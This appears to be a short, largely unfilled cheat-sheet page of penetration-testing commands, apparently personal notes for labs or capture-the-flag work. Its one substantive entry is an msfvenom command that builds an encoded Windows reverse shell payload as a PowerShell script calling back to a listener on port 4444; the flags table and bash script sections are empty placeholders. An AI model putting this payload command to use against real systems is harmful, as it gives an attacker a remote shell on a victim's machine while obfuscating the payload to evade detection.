Pre-made commands

Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

Flags

FlagDescription
-xWhat does it do

Useful Scripts

Useful bash script
#!/bin/bash